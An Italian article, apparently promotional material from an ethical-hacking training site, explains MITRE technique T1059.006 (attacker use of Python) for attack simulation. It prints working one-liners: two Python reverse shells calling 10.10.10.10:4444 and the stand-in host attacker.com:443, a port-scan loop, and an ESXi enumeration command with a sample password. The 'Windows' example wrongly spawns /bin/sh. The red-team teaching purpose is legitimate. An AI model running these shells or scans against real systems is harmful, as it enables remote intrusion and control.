Esecuzione Python: Command and Scripting Interpreter: Python (T1059.006)

L'esecuzione di script Python rappresenta una tecnica versatile nell'arsenale degli attaccanti moderni. Questa metodologia sfrutta l'interprete Python, presente nativamente su molti sistemi, per eseguire codice malevolo mascherato da operazioni legittime.

La tecnica si manifesta nella tattica TA0002 (Execution), posizionandosi nella fase di esecuzione del payload nella kill chain. Gli avversari utilizzano Python per stabilire persistenza, muoversi lateralmente e sottrarre dati sensibili.

I numeri parlano chiaro: 17 gruppi APT documentati, 34 strumenti malevoli che integrano Python, e 4 campagne di alto profilo hanno dimostrato l'efficacia di questo approccio. La popolarità deriva dalla natura multipiattaforma del linguaggio e dalla sua capacità di interagire profondamente con il sistema operativo attraverso librerie native.

La simulazione di attacchi Python richiede comprensione delle tecniche utilizzate dai threat actor reali. APT29 e Turla hanno dimostrato come Python possa bypassare controlli di sicurezza tradizionali.

Per Windows, l'esecuzione interattiva avviene tramite: python.exe -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"

Su macOS, Kimsuky ha utilizzato implant Python per raccolta dati. La simulazione prevede: python3 -c "import os,pty,socket;s=socket.socket();s.connect(('attacker.com',443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn('/bin/bash')"

Linux offre possibilità avanzate attraverso librerie di sistema. Earth Lusca ha dimostrato l'efficacia di script per port scanning: python3 -c "import socket;[(s:=socket.socket()).connect_ex(('target',p))or print(f'Port {p} open')for p in range(1,1024)]"

Per ambienti ESXi, UNC3886 ha utilizzato script per enumerazione: python3 enum_vms.py --host localhost --user root --password 'VMware1!'

La compilazione in eseguibili standalone aumenta la furtività. PyInstaller permette di creare binari auto-contenuti che non richiedono Python installato sul target. DropBook utilizza questa tecnica per mascherare backdoor Python come applicazioni legittime.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo